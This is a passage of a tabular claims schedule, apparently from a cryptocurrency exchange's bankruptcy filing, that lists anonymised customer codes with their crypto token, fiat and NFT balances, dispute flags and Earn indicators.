| 07337099 | | USD[10.00] | | |
| 07337100 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07337101 | | BCH[.00766058], BF_POINT[100], BTC[0], DOGE[0.97157046], ETH[0], LINK[0], LTC[0], MATIC[0], SHIB[4], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07337102 | | USD[10.00] | | |
| 07337103 | | USD[10.00] | | |
| 07337104 | | USD[10.00] | | |
| 07337105 | | USD[10.00] | | |
| 07337106 | | USD[10.00] | | |
| 07337107 | | BAT[1], BRZ[2], CUSDT[11.00007005], DOGE[2.05367657], ETH[.00012812], ETHW[.00012812], GRT[2], LTC[.00007497], MATIC[.48989422], SOL[4.61604232], TRX[5.75833233], USD[0.15], USDT[3] | | |
| 07337108 | | USD[0.00] | | |
| 07337109 | | BRZ[1], CUSDT[20], ETH[.00002876], ETHW[.00002876], TRX[2], USD[0.00] | | |
| 07337110 | | CUSDT[9], DOGE[185.48450828], SHIB[47895.87541612], SOL[.05491137], TRX[1], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07337111 | | USD[1218.33] | Yes | |
| 07337112 | | BTC[.0033844], DOGE[1], USD[10.00] | | |
| 07337113 | | USD[10.00] | | |
| 07337114 | | CUSDT[1], DOGE[132.07323929], SHIB[1], TRX[9.03819153], USD[0.43], USDT[1.08014519] | Yes | |
| 07337115 | | BTC[.00016782], NFT [539953326091606287/Entrance Voucher #2025][1], USD[0.00] | Yes | |
| 07337116 | | BTC[0], DOGE[4.32989787], USD[0.00] | Yes | |
| 07337117 | | BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07337118 | | CUSDT[1], DOGE[21.36695254], TRX[87.00741733], USD[0.00] | Yes | |
| 07337119 | | DOGE[1], USD[0.00] | | |
| 07337120 | | USD[10.00] | | |
| 07337121 | | BRZ[2], CUSDT[7], TRX[1], USD[0.01] | | |
| 07337122 | | USD[10.00] | | |
| 07337123 | | USD[10.00] | | |
| 07337124 | | USD[0.00] | | |
| 07337125 | | USD[10.00] | | |
| 07337126 | | USD[10.00] | | |
| 07337127 | | DOGE[1], USD[12.29] | | |
| 07337128 | | DOGE[.00002261], USD[8.28] | | |
| 07337129 | | USD[10.00] | | |
| 07337130 | | ETH[0], USD[0.00] | | |
| 07337131 | | BCH[1.67499493], BTC[0.01180338], DOGE[15323.92897838], ETH[0.43618394], ETHW[0.39930794], GRT[1211.265], LINK[17.1836], LTC[4.20340971], MATIC[261.087], SHIB[46795280], SOL[28.86413745], SUSHI[0], TRX[110.68800000], UNI[.05306617], USD[140.77], USDT[0.23088162] | | |
| 07337133 | | USD[10.00] | | |
| 07337134 | | USD[10.00] | | |
| 07337135 | | CUSDT[2], DOGE[773.21120545], SHIB[2], TRX[1.73989592], USD[0.05] | Yes | |
| 07337136 | | DOGE[.01549225], USD[0.01] | | |
| 07337137 | | USD[10.00] | | |
| 07337138 | | USD[10.00] | | |
| 07337139 | | BRZ[1], CUSDT[5], DOGE[8269.27042711], GRT[1.00498957], TRX[5], USD[0.00], USDT[1.10524101] | Yes | |
| 07337140 | | DOGE[1.00002714], USD[0.01] | | |
| 07337141 | | DOGE[0], USD[0.81] | | |
| 07337142 | | USD[10.00] | | |
| 07337144 | | BRZ[1], CAD[0.00], EUR[10.17], HKD[81.59], LTC[0.02474339], SHIB[1], TRX[1], USD[10.28] | Yes | |
| 07337145 | | CUSDT[2], DOGE[42.68491687], TRX[1], USD[5.51] | | |
| 07337146 | | BTC[.00026203], DOGE[1076.07519598], ETH[.01033389], ETHW[.01021077], USD[0.00] | Yes | |
| 07337147 | | USD[10.00] | | |
| 07337148 | | SHIB[3040215.54172587], USD[0.01], USDT[0] | | |
| 07337149 | | USD[11.04] | Yes | |
| 07337150 | | USD[0.00], USDT[0] | | |
| 07337152 | | CUSDT[2], DOGE[236.70645234], TRX[53.51151071], USD[0.01] | Yes | |
| 07337153 | | DAI[0], DOGE[0], GRT[20.89077988], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07337154 | | BAT[1], BTC[0], CUSDT[7], DOGE[0.00669923], TRX[1.00002021], USD[106.56] | | |
| 07337155 | | USD[10.00] | | |
| 07337156 | | ETH[.00595625], ETHW[.00595625], USD[0.00] | | |
| 07337157 | | USD[10.00] | | |
| 07337158 | | DOGE[1.00059746], USD[0.01] | | |
| 07337159 | | BRZ[1], DOGE[1], USD[0.01] | | |
| 07337160 | | USD[75.10] | | |
| 07337161 | | USD[10.00] | | |
| 07337162 | | USD[10.00] | | |
| 07337163 | | CUSDT[2], DOGE[633.65107356], USD[0.00] | | |
| 07337164 | | TRX[218.70314285], USD[0.00] | | |
| 07337165 | | USD[10.00] | | |
| 07337166 | | USD[10.00] | | |
| 07337167 | | DOGE[972.16715979], USD[0.00] | | |
| 07337169 | | BF_POINT[200], BTC[0], USD[0.00] | | |
| 07337170 | | BTC[.00018087], TRX[1], USD[0.00] | | |
| 07337171 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07337172 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07337173 | | BRZ[2], CUSDT[2], TRX[1], USD[149.32] | | |
| 07337174 | | DOGE[167.38321729], USD[0.00] | Yes | |
| 07337175 | | USD[10.00] | | |
| 07337176 | | USD[10.00] | | |
| 07337177 | | BTC[0.00170000], USD[0.92] | | |
| 07337178 | | SHIB[1], USD[0.00] | | |
| 07337179 | | USD[10.00] | | |
| 07337180 | | USD[0.00] | | |
| 07337181 | | USD[10.00] | | |
| 07337182 | | USD[0.00] | | |
| 07337183 | | DOGE[8884.33003373], TRX[1], USD[0.00] | | |
| 07337184 | | USD[50.00] | | |
| 07337185 | | BAT[1], CUSDT[10], ETH[0.00000001], ETHW[0], GRT[1], TRX[12], USD[0.00], USDT[0] | | |
| 07337186 | | USD[11.08] | Yes | |
| 07337187 | | USD[10.00] | | |
| 07337188 | | USD[10.00] | | |
| 07337189 | | USD[10.00] | | |
| 07337190 | | USD[10.00] | | |
| 07337191 | | USD[10.00] | | |
| 07337192 | | USD[10.00] | | |
| 07337193 | | USD[10.00] | | |
| 07337194 | | USD[10.00] | | |
| 07337195 | | CUSDT[1], USD[0.01] | | |
| 07337196 | | BAT[48.7871943], CUSDT[3], USD[0.00], USDT[0] | Yes | |
| 07337197 | | USD[10.00] | | |
| 07337198 | | CUSDT[1], DOGE[161.64377813], TRX[1], USD[0.00] | | |
| 07337199 | | USD[10.00] | | |
| 07337200 | | USD[10.00] | | |
| 07337201 | | TRX[1], USD[0.00] | | |
| 07337202 | | BRZ[1], USD[0.01] | | |
| 07337203 | | CUSDT[3], DOGE[1], TRX[1], USD[0.50] | Yes | |
| 07337204 | | BAT[2], BRZ[4], CUSDT[12], DOGE[2], ETH[.01459593], ETHW[.01459593], GRT[2], TRX[7], USD[0.00] | | |
| 07337205 | | BRZ[1], CUSDT[3], TRX[3], USD[0.00] | | |
| 07337206 | | BRZ[3], BTC[0], CAD[0.45], CUSDT[8], DOGE[0.75383710], ETH[0], ETHW[0], GRT[1], LINK[.00049749], SHIB[1314.8573694], SUSHI[0.00018654], TRX[104.89909640], USD[0.71], USDT[1.55557800] | | |
| 07337207 | Contingent, Disputed | DOGE[0], ETH[0], ETHW[0], SHIB[0], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07337208 | | USD[10.00] | | |
| 07337209 | | USD[10.00] | | |
| 07337210 | | USD[10.00] | | |
| 07337211 | | USD[10.00] | | |
| 07337212 | | USD[10.00] | | |
| 07337213 | | USD[10.00] | | |
| 07337214 | | CUSDT[99.22017467], DOGE[99.99995694], TRX[277.513922], USD[0.00] | | |
| 07337215 | | USD[10.00] | | |
| 07337216 | | DOGE[589.4889182], SHIB[1], USD[0.01], USDT[0] | Yes | |
| 07337217 | | USD[10.00] | | |
| 07337218 | | CUSDT[1], DOGE[.17948823], USD[118.35] | | |
| 07337219 | | USD[10.00] | | |
| 07337220 | | USD[0.01] | | |
| 07337221 | | BTC[.0035964], DOGE[2066.7], SOL[.11778], USD[2.01] | | |
| 07337222 | | USD[10.00] | | |
| 07337223 | | USD[10.00] | | |
| 07337224 | | GRT[4.56975851], USD[0.00] | | |
| 07337225 | | CUSDT[2], USD[0.05] | | |
| 07337226 | | USD[10.00] | | |
| 07337227 | | BRZ[1], CUSDT[3], DOGE[1501.51986232], ETH[.10227753], ETHW[.10227753], TRX[1], USD[0.17] | | |
| 07337228 | | ETH[.00001051], ETHW[.00001051], LINK[.0000936], USD[0.00] | Yes | |
| 07337229 | | USD[10.00] | | |
| 07337232 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07337233 | | DOGE[110.33194811], ETH[.00267398], ETHW[.00267398], USD[10.12] | | |
| 07337234 | | DOGE[313.79720622], USD[0.00] | | |
| 07337235 | | USD[10.00] | | |
| 07337236 | | DOGE[.00001613], USD[0.00] | | |
| 07337237 | | CUSDT[6], DOGE[.00002167], TRX[1], USD[0.00] | | |
| 07337238 | | CUSDT[1], USD[0.18], USDT[0.00029147] | | |
| 07337239 | | USD[10.00] | | |
| 07337240 | | USD[10.00] | | |
| 07337241 | | USD[10.00] | | |
| 07337242 | | USD[10.00] | | |
| 07337243 | | USD[10.00] | | |
| 07337244 | | USD[10.00] | | |
| 07337245 | | BTC[0], ETH[0], UNI[0], USD[0.00], USDT[0.00000001] | | |
| 07337246 | | USD[10.00] | | |
| 07337247 | | BRZ[1], BTC[.00211403], CUSDT[2], DOGE[6833.79655661], ETH[.02137328], ETHW[.02111233], SHIB[331540.13377282], TRX[1], USD[0.00] | Yes | |
| 07337248 | | BTC[0], CUSDT[1], DOGE[1.00009887], GRT[0.00095056], SOL[0], SUSHI[0], USD[0.00] | | |
| 07337249 | | USD[10.00] | | |
| 07337250 | | USD[10.00] | | |
| 07337251 | | BRZ[1], CUSDT[3], DOGE[1], MATIC[95.16232036], USD[0.00], USDT[1.09673482] | Yes | |
| 07337252 | | USD[10.00] | | |
| 07337253 | | USD[10.00] | | |
| 07337254 | | BAT[1.0165555], BCH[0], BRZ[2], BTC[0.00000006], CUSDT[13], DOGE[0], ETH[.00000003], ETHW[.00000003], LINK[0], LTC[0.00000642], SHIB[1], SOL[0.00001858], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07337255 | | BTC[0], DOGE[0], GRT[0], SOL[0], USD[10.00] | | |
| 07337257 | | DOGE[2], TRX[1], USD[0.00] | | |
| 07337258 | | BAT[15.9705089], BRZ[1], CUSDT[2], DOGE[660.92019963], ETH[.37697945], ETHW[.37688657], TRX[5053.65491634], USD[0.00], USDT[0] | Yes | |
| 07337259 | | CUSDT[4], TRX[1], USD[0.00] | | |
| 07337260 | | USD[10.00] | | |
| 07337261 | | USD[10.00] | | |
| 07337262 | | BRZ[2], BTC[0.00433141], CUSDT[6], DOGE[1], SHIB[2], TRX[1], USD[0.00] | Yes | |
| 07337263 | | USD[10.00] | | |
| 07337264 | | USD[0.00] | | |
| 07337265 | | CUSDT[1], DOGE[13126.65674816], USD[10.00] | | |
| 07337266 | | USD[10.00] | | |
| 07337267 | | USD[10.00] | | |
| 07337268 | | USD[10.00] | | |
| 07337270 | | BRZ[1], CUSDT[4], TRX[1], USD[0.01] | | |
| 07337271 | | BAT[4.43613028], BCH[0], BRZ[11.0903257], BTC[0], CUSDT[21], DOGE[1], ETH[0], GRT[5.32822154], TRX[41.03420482], USD[0.00] | Yes | |
| 07337272 | | CUSDT[1], DOGE[42.07917406], USD[0.00] | | |
| 07337273 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07337274 | | USD[10.00] | | |
| 07337275 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07337276 | | DOGE[58.51465289], USD[0.00], USDT[0.00000001] | Yes | |
| 07337277 | | SUSHI[0], TRX[1], USD[0.01] | | |
| 07337278 | | BRZ[0], BTC[0], DOGE[0], GRT[0], TRX[0], USD[0.01] | | |
| 07337279 | | USD[10.00] | | |
| 07337280 | | BRZ[1], BTC[0], DOGE[1], USD[65.40], USDT[0.00400587] | | |
| 07337281 | | USD[0.00], USDT[0] | | |
| 07337282 | | USD[10.00] | | |
| 07337283 | | USD[0.00] | | |
| 07337285 | | BRZ[0], BTC[0], CUSDT[3], DOGE[0.00004376], USD[10.00] | | |
| 07337286 | | USD[0.00] | | |
| 07337287 | | USD[10.00] | | |
| 07337288 | | DOGE[1], USD[0.01] | | |
| 07337289 | | USD[10.00] | | |
| 07337290 | | USD[10.00] | | |
| 07337291 | | USD[0.00] | | |
| 07337292 | | USD[10.00] | | |
| 07337293 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07337294 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07337295 | | USD[10.00] | | |
| 07337296 | | SOL[.39135313], USD[0.00] | Yes | |
| 07337297 | | USD[0.92] | | |
| 07337298 | | USD[10.61] | Yes | |
| 07337299 | | BTC[0], CUSDT[0], DOGE[0], ETH[0], TRX[0], USD[0.00] | Yes | |
| 07337300 | | DOGE[1], ETH[0.00000014], SHIB[0], TRX[0], USD[0.00] | Yes | |
| 07337301 | | BAT[1.01405389], BRZ[3], CUSDT[1], DOGE[2], GRT[2.07694069], SHIB[2], SUSHI[.79518487], TRX[7], USD[0.00], USDT[0] | Yes | |
| 07337302 | | DOGE[0], USD[0.07] | | |
| 07337304 | | BRZ[2], CUSDT[6], DOGE[1], TRX[4], USD[0.00] | | |
| 07337305 | | USD[10.00] | | |
| 07337306 | | USD[0.00] | | |
| 07337307 | | BAT[1.01655549], BRZ[4], CUSDT[4], DOGE[1], GRT[1.00498957], TRX[1], USD[0.00], USDT[2.21958495] | Yes | |
| 07337308 | | DOGE[0], USD[0.00] | | |
| 07337309 | | USD[10.00] | | |
| 07337310 | | CUSDT[2], DOGE[1], USD[0.25] | | |
| 07337311 | | USD[10.00] | | |
| 07337312 | | BRZ[1], CUSDT[9], MATIC[0], SOL[2.24498349], SUSHI[0], TRX[518.20130384], UNI[0], USD[10.31], USDT[10.27073301] | Yes | |
| 07337313 | | USD[10.00] | | |
| 07337314 | | TRX[1], USD[227.00] | | |
| 07337315 | | USD[10.00] | | |
| 07337316 | | DOGE[860.06625448], USD[10.00] | | |
| 07337317 | | DOGE[0], TRX[.03487152], USD[0.00] | | |
| 07337318 | | BTC[.0001056], DOGE[41.87975019], USD[0.00] | | |
| 07337319 | | USD[10.00] | | |
| 07337321 | | CUSDT[1], USD[0.00] | Yes | |
| 07337322 | | USD[10.00] | | |
| 07337323 | | CUSDT[2], SHIB[3], USD[12.01] | | |
| 07337324 | | USD[0.37] | | |
| 07337325 | | USD[10.00] | | |
| 07337326 | | DOGE[12.69850009], USD[5.00] | | |
| 07337327 | | USD[10.00] | | |
| 07337328 | | USD[10.00] | | |
| 07337330 | | SOL[.256153378], USD[0.00] | | |
| 07337331 | | USD[10.00] | | |
| 07337332 | | BTC[.02864095], CUSDT[4], DOGE[3431.36579208], ETH[.45201866], ETHW[.45201866], LTC[1.60268606], SUSHI[12.21398669], TRX[4], USD[507.84] | | |
| 07337333 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07337335 | | USD[10.00] | | |
| 07337336 | | BAT[2], BRZ[3], CUSDT[1], GRT[1], TRX[5], USD[0.00] | | |
| 07337337 | | USD[10.00] | | |
| 07337338 | | CUSDT[5], DOGE[1], TRX[2], USD[0.01] | | |
| 07337339 | | USD[10.00] | | |
| 07337340 | | TRX[1], USD[0.01] | Yes | |
| 07337341 | | USD[10.00] | | |
| 07337342 | | BRZ[0], BTC[0], DOGE[0.10695008], LTC[0], SHIB[0], UNI[0], USD[0.00] | Yes | |
| 07337343 | | BRZ[1], CUSDT[3], DOGE[0], SOL[0], TRX[807.02040529], USD[0.00] | | |
| 07337345 | | DOGE[77.67208988], USD[0.00] | | |
| 07337346 | | USD[0.00] | | |
| 07337347 | | USD[10.00] | | |
| 07337348 | | USD[0.06] | | |
| 07337349 | | USD[10.00] | | |
| 07337350 | | BTC[.00022753], DOGE[98.91781603], ETH[.0021362], ETHW[.00210882], TRX[35.3143471], USD[0.62] | Yes | |
| 07337351 | | USD[0.04] | | |
| 07337352 | | USD[10.00] | | |
| 07337353 | | BRZ[1], BTC[.00000301], CUSDT[2], DOGE[2], GRT[1.00498957], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07337354 | | USD[10.00] | | |
| 07337356 | | ETH[.00000009], ETHW[.00000009], USD[0.00] | | |
| 07337357 | | BRZ[1], CUSDT[1], DOGE[4142.83307762], USD[0.37] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07337359 | | USD[0.00] | | |
| 07337360 | | USD[10.00] | | |
| 07337361 | | DOGE[.00276998], USD[0.00], USDT[0] | | |
| 07337362 | | BRZ[2], CUSDT[10], DOGE[691.68939698], USD[0.00] | Yes | |
| 07337363 | | USD[10.00] | | |
| 07337364 | | BRZ[1], CUSDT[13.23717263], DOGE[.00017484], ETH[0], USD[0.01], USDT[0] | Yes | |
| 07337366 | | USD[10.00] | | |
| 07337367 | | BTC[.00226165], DOGE[79.19285856], ETH[.01382521], ETHW[.01365046], SHIB[1], USD[33.99] | Yes | |
| 07337368 | | USD[10.00] | | |
| 07337369 | | USD[0.01] | | |
| 07337370 | | DOGE[111.38824023], USD[0.00] | | |
| 07337372 | | CUSDT[3], DOGE[1], TRX[3], USD[0.63] | | |
| 07337373 | | CUSDT[1], DOGE[294.71825523], UNI[.95638068], USD[0.00] | | |
| 07337374 | | USD[10.59] | Yes | |
| 07337375 | | USD[0.01], USDT[0] | Yes | |
| 07337376 | | USD[10.00] | | |
| 07337377 | | DOGE[39.0635834], USD[0.00] | | |
| 07337378 | | DOGE[1.00000537], USD[0.00] | | |
| 07337379 | | BRZ[1], DOGE[323.28203264], GRT[6.68065247], TRX[3], USD[0.00] | | |
| 07337380 | | BRZ[1], CUSDT[471.29069823], DOGE[536.1934095], KSHIB[257.93529332], LTC[.03642556], SHIB[3437001.50302395], TRX[72.19917277], USD[0.00] | | |
| 07337381 | | DOGE[0.03034628], USD[0.00] | | |
| 07337382 | | USD[10.00] | | |
| 07337383 | | CUSDT[2], USD[0.01] | | |
| 07337384 | | BRZ[1], BTC[0], GRT[1], TRX[5], USD[0.66], USDT[0] | | |
| 07337385 | | USD[10.00] | | |
| 07337386 | | USD[10.00] | | |
| 07337387 | | USD[10.00] | | |
| 07337388 | | USD[0.01] | | |
| 07337389 | | DOGE[251.99359967], USD[10.00] | | |
| 07337390 | | USD[10.00] | | |
| 07337391 | | USD[10.00] | | |
| 07337393 | | CUSDT[8], TRX[1], USD[10.79] | | |
| 07337394 | | DOGE[3863.57710554], ETH[.08341469], ETHW[.08239243], USD[0.00] | Yes | |
| 07337395 | | DOGE[1.62954878], USD[0.00] | Yes | |
| 07337396 | | USD[0.06] | | |
| 07337397 | | CUSDT[1], DOGE[1.00004477], USD[0.00] | | |
| 07337398 | | USD[10.00] | | |
| 07337399 | | USD[10.00] | | |
| 07337400 | | USD[0.04] | | |
| 07337401 | | DOGE[19.78960013], TRX[1], USD[0.00] | | |
| 07337402 | | CUSDT[1], DOGE[0], UNI[0], USD[0.00] | | |
| 07337403 | | USD[10.00] | | |
| 07337404 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07337405 | | BRZ[3], CUSDT[25], DOGE[1], MATIC[24.46409307], SHIB[683927.32036012], SOL[.27447828], SUSHI[16.89684272], TRX[236.89476084], USD[0.00], USDT[0] | Yes | |
| 07337407 | | USD[10.00] | | |
| 07337408 | | USD[10.00] | | |
| 07337409 | | CUSDT[1], SUSHI[1.04246219], USD[0.00] | | |
| 07337410 | | CUSDT[4], SHIB[29.59029126], TRX[2], USD[0.00] | | |
| 07337411 | | DOGE[2], USD[0.00] | | |
| 07337412 | | USD[10.00] | | |
| 07337414 | | BRZ[3], BTC[0], CUSDT[7], DOGE[0], ETH[0.00000001], ETHW[0], LTC[0], SOL[0], TRX[2], USD[0.00] | Yes | |
| 07337416 | | GRT[4.70800438], USD[0.00] | Yes | |
| 07337417 | | BRZ[2], BTC[0], CUSDT[2], DOGE[0], ETH[0], GRT[1.00498957], LTC[0], SOL[0], TRX[2], USD[0.00], USDT[1.10784821] | Yes | |
| 07337418 | | USD[10.00] | | |
| 07337419 | | GRT[4.51076927], USD[0.00] | Yes | |
| 07337420 | | GRT[4.16960724], USD[0.00] | | |
| 07337421 | | USD[10.00] | | |
| 07337422 | | CUSDT[2], DOGE[1084.41761154], ETH[.01540118], ETHW[.01540118], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07337423 | | USD[10.00] | | |
| 07337424 | | USD[10.00] | | |
| 07337425 | | CUSDT[1], USD[5.47] | | |
| 07337427 | | BRZ[1], DOGE[.00017737], TRX[1], USD[0.01] | | |
| 07337428 | | USD[10.00] | | |
| 07337429 | | DOGE[34530.28981537], USD[0.00] | | |
| 07337430 | | BAT[0], USD[0.00] | Yes | |
| 07337432 | | DOGE[0], SHIB[321.10874529], USD[0.01] | | |
| 07337433 | | USD[9.83] | | |
| 07337434 | | USD[10.00] | | |
| 07337435 | | USD[10.00] | | |
| 07337436 | | USD[10.00] | | |
| 07337437 | | DOGE[2], ETH[0], ETHW[0], USD[0.01] | | |
| 07337438 | | USD[10.36] | Yes | |
| 07337439 | | BRZ[1], DOGE[55.02598166], USD[0.00] | | |
| 07337440 | | USD[10.00] | | |
| 07337441 | | BTC[0], ETH[0] | | |
| 07337442 | | USD[10.00] | | |
| 07337443 | | SUSHI[11.23948887], TRX[1], USD[11.10] | Yes | |
| 07337444 | | DOGE[.89638375], LINK[.06874502], UNI[.05385172], USD[-0.32] | | |
| 07337445 | | BTC[.05263636], CUSDT[1], ETH[1.41667417], ETHW[1.41606624], USD[10.88], USDT[1.09185807] | Yes | |
| 07337446 | | USD[10.00] | | |
| 07337447 | | SHIB[22.91800223], USD[0.00] | Yes | |
| 07337450 | | SOL[1.26922655], USD[0.00] | | |
| 07337451 | | BRZ[111.11846962], DOGE[1], USD[0.00] | | |
| 07337452 | | SHIB[1], USD[0.00] | Yes | |
| 07337453 | | USD[10.00] | | |
| 07337454 | | BAT[0], BRZ[0], BTC[0], DOGE[1], KSHIB[0], NFT [472052018373594332/Entrance Voucher #3735][1], SHIB[1338205.06140154], TRX[1.00826183], USD[0.00] | Yes | |
| 07337455 | | BTC[0], DOGE[2], TRX[88.78006425], USD[0.00], USDT[0] | | |
| 07337456 | | CUSDT[1], USD[0.01] | | |
| 07337457 | | BTC[0], USD[0.00] | | |
| 07337458 | | USD[10.00] | | |
| 07337459 | | USD[10.00] | | |
| 07337460 | | BRZ[1], CUSDT[9], TRX[1], USD[0.00] | | |
| 07337461 | | USD[10.00] | | |
| 07337462 | | USD[10.00] | | |
| 07337463 | | CUSDT[2], DOGE[2], USD[0.00] | | |
| 07337464 | | USD[10.00] | | |
| 07337465 | | BTC[.00067943], USD[0.00], USDT[0] | Yes | |
| 07337466 | | USD[10.00] | | |
| 07337467 | | CUSDT[1], DOGE[6356.93734601], USD[0.00] | | |
| 07337468 | | USD[0.01] | | |
| 07337469 | | BTC[0], DOGE[2], TRX[1], USD[0.00] | | |
| 07337470 | | CUSDT[5], DOGE[2630.02076729], KSHIB[139.78938492], SHIB[158737.29129025], TRX[548.18178871], USD[58.45] | Yes | |
| 07337471 | | DOGE[.17817349], USD[0.00], USDT[0.00000001] | | |
| 07337472 | | DOGE[1], USD[0.00] | | |
| 07337473 | | BRZ[2], BTC[0], CUSDT[4], DOGE[0], TRX[1], USD[0.00] | | |
| 07337474 | | DOGE[4707.34792841], USD[0.20] | | |
| 07337475 | | CUSDT[3], DOGE[822.8873833], KSHIB[348.85708604], TRX[1], USD[0.50] | | |
| 07337476 | | USD[10.00] | | |
| 07337477 | | USD[10.00] | | |
| 07337480 | | BTC[.00090338], CUSDT[12], DOGE[2923.55952749], LINK[5.06440893], SHIB[703253.05407101], SOL[1.11632649], USD[0.00] | Yes | |
| 07337481 | | CUSDT[2], DOGE[1], TRX[0.00000400], USD[0.00] | | |
| 07337482 | | DOGE[713.69421079], TRX[1], USD[0.00] | | |
| 07337483 | | USD[10.00] | | |
| 07337484 | | USD[10.00] | | |
| 07337485 | | USD[10.00] | | |
| 07337486 | | CUSDT[3], DOGE[23.43864642], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07337487 | | USD[10.00] | | |
| 07337489 | | USD[10.00] | | |
| 07337490 | | DOGE[1.00079577], USD[0.00], USDT[0] | Yes | |
| 07337491 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07337492 | | USD[10.00] | | |
| 07337493 | | USD[10.00] | | |
| 07337494 | | AVAX[0], BAT[0], BCH[0], BTC[0], CUSDT[40], DOGE[0], ETH[0], ETHW[0], GRT[0], KSHIB[0], LINK[0], LTC[0], MATIC[0], SHIB[1], SOL[0], SUSHI[0], TRX[10], UNI[0], USD[1.36], USDT[0.00042859] | Yes | |
| 07337495 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07337496 | | USD[10.00] | | |
| 07337497 | | USD[10.00] | | |
| 07337498 | | BRZ[0], CUSDT[4], DOGE[33.56313961], USD[2.83] | | |
| 07337501 | | USD[10.90] | Yes | |
| 07337502 | | BRZ[1], CUSDT[2], DOGE[2], TRX[3], USD[0.00] | | |
| 07337504 | | USD[10.00] | | |
| 07337505 | | USD[9.84] | | |
| 07337506 | | CUSDT[3], SHIB[3], TRX[34.05634388], USD[0.00] | Yes | |
| 07337507 | | USD[10.00] | | |
| 07337508 | | USD[10.00] | | |
| 07337509 | | USD[10.00] | | |
| 07337510 | | DOGE[136.33592298], TRX[1], USD[0.00] | | |
| 07337511 | | CUSDT[5], DOGE[0], SHIB[1], SOL[.00017743], USD[11.79] | Yes | |
| 07337512 | | USD[10.00] | | |
| 07337513 | | BAT[0], BCH[0.34144195], BRZ[1.25010739], BTC[0.00000091], CUSDT[23], DOGE[26.10197472], ETH[0], ETHW[0], GRT[295.97966344], LINK[.00001553], LTC[0.00100331], MATIC[0], SHIB[5], SOL[.00147053], SUSHI[0], TRX[1826.35045983], UNI[0.00001861], USD[45.86], USDT[0] | Yes | |
| 07337514 | | USD[10.00] | | |
| 07337515 | | GRT[1], TRX[2], USD[0.01] | | |
| 07337516 | | BCH[.12487203], CUSDT[1], DOGE[2654.62480809], USD[0.00] | Yes | |
| 07337517 | | USD[10.00] | | |
| 07337518 | | CUSDT[1], DOGE[13500.36081433], SHIB[2], TRX[1], USD[0.01], USDT[1] | | |
| 07337519 | | BCH[0], BRZ[1], BTC[0], CUSDT[1], DOGE[0], LTC[0], TRX[1], USD[0.01], USDT[0] | | |
| 07337520 | | USD[0.10] | | |
| 07337521 | | USD[10.00] | | |
| 07337522 | | USD[10.00] | | |
| 07337523 | | BRZ[1], CUSDT[2], DOGE[1582.6613405], USD[0.00] | | |
| 07337524 | | DOGE[3], ETH[.00000035], ETHW[.00000569], GRT[1], SHIB[1], TRX[2], USD[50.33] | Yes | |
| 07337525 | | USD[10.00] | | |
| 07337526 | | USD[0.00] | Yes | |
| 07337527 | | USD[10.00] | | |
| 07337528 | | ETH[.00000001], SHIB[87048572.19132641], USD[0.00], USDT[0] | Yes | |
| 07337529 | | DOGE[1], USD[0.00] | | |
| 07337530 | | BRZ[1], CUSDT[272.97719152], TRX[3], USD[0.01] | Yes | |
| 07337531 | | USD[10.00] | | |
| 07337533 | | USD[10.00] | | |
| 07337534 | | TRX[1], USD[0.66] | | |
| 07337535 | | BRZ[0], BTC[0], DOGE[43.75910895], SHIB[3], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07337536 | | USD[10.00] | | |
| 07337537 | | USD[10.00] | | |
| 07337539 | | AVAX[14.12630329], BAT[1], BRZ[1], BTC[.00694168], CUSDT[5], DOGE[2], GRT[3], TRX[8], USD[0.00], USDT[2] | | |
| 07337540 | | USD[0.13] | | |
| 07337541 | | DOGE[1], USD[0.01] | | |
| 07337542 | | DOGE[1550.02596076], USD[0.00] | Yes | |
| 07337543 | | USD[10.00] | | |
| 07337544 | | BTC[0.00001291], ETH[0], USD[0.00] | | |
| 07337545 | | BF_POINT[300], BTC[.00652888], CUSDT[1], DOGE[7742.04454585], ETH[.16187909], ETHW[.16140769], USD[0.00] | Yes | |
| 07337546 | | USD[10.90] | Yes | |
| 07337547 | | BTC[0.00000448], USD[0.00] | Yes | |
| 07337548 | | USD[10.00] | | |
| 07337549 | | BRZ[1], TRX[1], USD[0.01] | | |
| 07337550 | | DOGE[1.59784691], USD[64.86] | | |

